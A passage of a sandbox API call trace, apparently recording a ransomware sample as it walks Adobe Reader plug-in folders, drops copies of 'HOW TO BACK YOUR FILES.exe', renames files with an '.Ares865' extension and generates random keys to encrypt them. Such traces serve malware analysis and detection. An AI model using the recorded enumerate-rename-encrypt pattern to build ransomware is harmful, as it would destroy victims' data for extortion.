10.0\\reader\\plug_ins\\multimedia\\how to back your files.exe"), bFailIfExists=1) returned 0 [0172.528] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0172.529] GetLastError () returned 0x0 [0172.530] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0172.530] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54888ee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54888ee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0172.530] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0172.531] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0172.531] lstrcpyW (in: lpString1=0x2cce488, lpString2="MPP" | out: lpString1="MPP") returned="MPP" [0172.531] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ba8 [0172.531] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x90) returned 0x337060 [0172.531] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bb0 | out: ListHead=0x2e7710, ListEntry=0x2e7bb0) returned 0x2e79d0 [0172.531] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d82ddc0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x549475c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x549475c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MPP_CZE", cAlternateFileName="")) returned 1 [0172.531] lstrcmpiW (lpString1="MPP_CZE", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0172.531] lstrcmpiW (lpString1="MPP_CZE", lpString2="aoldtz.exe") returned 1 [0172.531] lstrcpyW (in: lpString1=0x2cce488, lpString2="MPP_CZE" | out: lpString1="MPP_CZE") returned="MPP_CZE" [0172.531] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7aa8 [0172.531] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x98) returned 0x31afc8 [0172.531] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ab0 | out: ListHead=0x2e7710, ListEntry=0x2e7ab0) returned 0x2e7bb0 [0172.531] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d853f20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x549475c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x549475c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MPP_HRV", cAlternateFileName="")) returned 1 [0172.531] lstrcmpiW (lpString1="MPP_HRV", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0172.531] lstrcmpiW (lpString1="MPP_HRV", lpString2="aoldtz.exe") returned 1 [0172.532] lstrcpyW (in: lpString1=0x2cce488, lpString2="MPP_HRV" | out: lpString1="MPP_HRV") returned="MPP_HRV" [0172.532] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ac8 [0172.532] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x98) returned 0x31b068 [0172.532] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ad0 | out: ListHead=0x2e7710, ListEntry=0x2e7ad0) returned 0x2e7ab0 [0172.532] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d82ddc0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54921460, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54921460, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MPP_HUN", cAlternateFileName="")) returned 1 [0172.532] lstrcmpiW (lpString1="MPP_HUN", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0172.532] lstrcmpiW (lpString1="MPP_HUN", lpString2="aoldtz.exe") returned 1 [0172.532] lstrcpyW (in: lpString1=0x2cce488, lpString2="MPP_HUN" | out: lpString1="MPP_HUN") returned="MPP_HUN" [0172.532] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ae8 [0172.532] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x98) returned 0x31b108 [0172.532] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7af0 | out: ListHead=0x2e7710, ListEntry=0x2e7af0) returned 0x2e7ad0 [0172.532] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d82ddc0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54921460, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54921460, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MPP_POL", cAlternateFileName="")) returned 1 [0172.532] lstrcmpiW (lpString1="MPP_POL", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0172.532] lstrcmpiW (lpString1="MPP_POL", lpString2="aoldtz.exe") returned 1 [0172.532] lstrcpyW (in: lpString1=0x2cce488, lpString2="MPP_POL" | out: lpString1="MPP_POL") returned="MPP_POL" [0172.532] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b08 [0172.532] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x98) returned 0x31b1a8 [0172.532] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b10 | out: ListHead=0x2e7710, ListEntry=0x2e7b10) returned 0x2e7af0 [0172.532] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d807c60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x548fb300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x548fb300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MPP_RUM", cAlternateFileName="")) returned 1 [0172.532] lstrcmpiW (lpString1="MPP_RUM", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0172.532] lstrcmpiW (lpString1="MPP_RUM", lpString2="aoldtz.exe") returned 1 [0172.533] lstrcpyW (in: lpString1=0x2cce488, lpString2="MPP_RUM" | out: lpString1="MPP_RUM") returned="MPP_RUM" [0172.533] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0172.533] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x98) returned 0x31b248 [0172.533] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b50 | out: ListHead=0x2e7710, ListEntry=0x2e7b50) returned 0x2e7b10 [0172.533] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d807c60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x548fb300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x548fb300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MPP_RUS", cAlternateFileName="")) returned 1 [0172.533] lstrcmpiW (lpString1="MPP_RUS", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0172.533] lstrcmpiW (lpString1="MPP_RUS", lpString2="aoldtz.exe") returned 1 [0172.533] lstrcpyW (in: lpString1=0x2cce488, lpString2="MPP_RUS" | out: lpString1="MPP_RUS") returned="MPP_RUS" [0172.533] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0172.533] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x98) returned 0x31b2e8 [0172.533] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0172.533] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d807c60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x548d51a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x548d51a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MPP_SKY", cAlternateFileName="")) returned 1 [0172.533] lstrcmpiW (lpString1="MPP_SKY", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0172.533] lstrcmpiW (lpString1="MPP_SKY", lpString2="aoldtz.exe") returned 1 [0172.533] lstrcpyW (in: lpString1=0x2cce488, lpString2="MPP_SKY" | out: lpString1="MPP_SKY") returned="MPP_SKY" [0172.533] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0172.534] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x98) returned 0x31b388 [0172.534] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7b70 [0172.534] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7e1b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x548d51a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x548d51a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MPP_SLV", cAlternateFileName="")) returned 1 [0172.534] lstrcmpiW (lpString1="MPP_SLV", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0172.534] lstrcmpiW (lpString1="MPP_SLV", lpString2="aoldtz.exe") returned 1 [0172.534] lstrcpyW (in: lpString1=0x2cce488, lpString2="MPP_SLV" | out: lpString1="MPP_SLV") returned="MPP_SLV" [0172.534] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0172.534] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x98) returned 0x31b428 [0172.534] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7bd0 [0172.534] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7e1b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x548af040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x548af040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MPP_TUR", cAlternateFileName="")) returned 1 [0172.534] lstrcmpiW (lpString1="MPP_TUR", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0172.534] lstrcmpiW (lpString1="MPP_TUR", lpString2="aoldtz.exe") returned 1 [0172.534] lstrcpyW (in: lpString1=0x2cce488, lpString2="MPP_TUR" | out: lpString1="MPP_TUR") returned="MPP_TUR" [0172.534] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0172.534] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x98) returned 0x31b4c8 [0172.534] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7cb0 [0172.534] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7e1b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x548af040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x548af040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MPP_UKR", cAlternateFileName="")) returned 1 [0172.534] lstrcmpiW (lpString1="MPP_UKR", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0172.534] lstrcmpiW (lpString1="MPP_UKR", lpString2="aoldtz.exe") returned 1 [0172.535] lstrcpyW (in: lpString1=0x2cce488, lpString2="MPP_UKR" | out: lpString1="MPP_UKR") returned="MPP_UKR" [0172.535] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c28 [0172.535] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x98) returned 0x31b568 [0172.535] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c30 | out: ListHead=0x2e7710, ListEntry=0x2e7c30) returned 0x2e7b90 [0172.535] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7e1b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x548af040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x548af040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MPP_UKR", cAlternateFileName="")) returned 0 [0172.535] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0172.535] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c30 [0172.535] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR" [0172.535] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR" [0172.535] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0172.535] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_ukr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0172.536] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0172.537] GetLastError () returned 0x0 [0172.537] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0172.537] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7e1b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x548af040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x548af040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0172.537] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0172.537] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0172.537] lstrcpyW (in: lpString1=0x2cce498, lpString2="Flash.UKR" | out: lpString1="Flash.UKR") returned="Flash.UKR" [0172.537] lstrlenW (lpString="Flash.UKR") returned 9 [0172.537] lstrlenW (lpString="Ares865") returned 7 [0172.537] lstrcmpiW (lpString1="ash.UKR", lpString2="Ares865") returned 1 [0172.538] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR\\Flash.UKR.Ares865") returned 93 [0172.538] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR\\Flash.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_ukr\\flash.ukr"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR\\Flash.UKR.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_ukr\\flash.ukr.ares865"), dwFlags=0x1) returned 1 [0172.539] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR\\Flash.UKR.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_ukr\\flash.ukr.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.539] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0172.540] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.540] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.540] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.560] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.561] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.561] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.561] lstrcpyW (in: lpString1=0x2cce498, lpString2="MCIMPP.UKR" | out: lpString1="MCIMPP.UKR") returned="MCIMPP.UKR" [0172.561] lstrlenW (lpString="MCIMPP.UKR") returned 10 [0172.561] lstrlenW (lpString="Ares865") returned 7 [0172.561] lstrcmpiW (lpString1="MPP.UKR", lpString2="Ares865") returned 1 [0172.562] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR\\MCIMPP.UKR.Ares865") returned 94 [0172.562] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR\\MCIMPP.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_ukr\\mcimpp.ukr"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR\\MCIMPP.UKR.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_ukr\\mcimpp.ukr.ares865"), dwFlags=0x1) returned 1 [0172.564] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR\\MCIMPP.UKR.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_ukr\\mcimpp.ukr.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.564] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0172.564] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.565] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.565] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.572] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.573] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.573] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.573] lstrcpyW (in: lpString1=0x2cce498, lpString2="QuickTime.UKR" | out: lpString1="QuickTime.UKR") returned="QuickTime.UKR" [0172.573] lstrlenW (lpString="QuickTime.UKR") returned 13 [0172.573] lstrlenW (lpString="Ares865") returned 7 [0172.573] lstrcmpiW (lpString1="ime.UKR", lpString2="Ares865") returned 1 [0172.574] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR\\QuickTime.UKR.Ares865") returned 97 [0172.574] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR\\QuickTime.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_ukr\\quicktime.ukr"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR\\QuickTime.UKR.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_ukr\\quicktime.ukr.ares865"), dwFlags=0x1) returned 1 [0172.575] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR\\QuickTime.UKR.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_ukr\\quicktime.ukr.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.576] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0172.576] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.577] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.577] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.585] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.586] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.586] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.587] lstrcpyW (in: lpString1=0x2cce498, lpString2="WindowsMedia.UKR" | out: lpString1="WindowsMedia.UKR") returned="WindowsMedia.UKR" [0172.587] lstrlenW (lpString="WindowsMedia.UKR") returned 16 [0172.587] lstrlenW (lpString="Ares865") returned 7 [0172.587] lstrcmpiW (lpString1="dia.UKR", lpString2="Ares865") returned 1 [0172.587] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR\\WindowsMedia.UKR.Ares865") returned 100 [0172.587] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR\\WindowsMedia.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_ukr\\windowsmedia.ukr"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR\\WindowsMedia.UKR.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_ukr\\windowsmedia.ukr.ares865"), dwFlags=0x1) returned 1 [0172.601] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR\\WindowsMedia.UKR.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_ukr\\windowsmedia.ukr.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.601] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0172.601] CryptAcquireContextW (in: phProv=0x2ccce54, 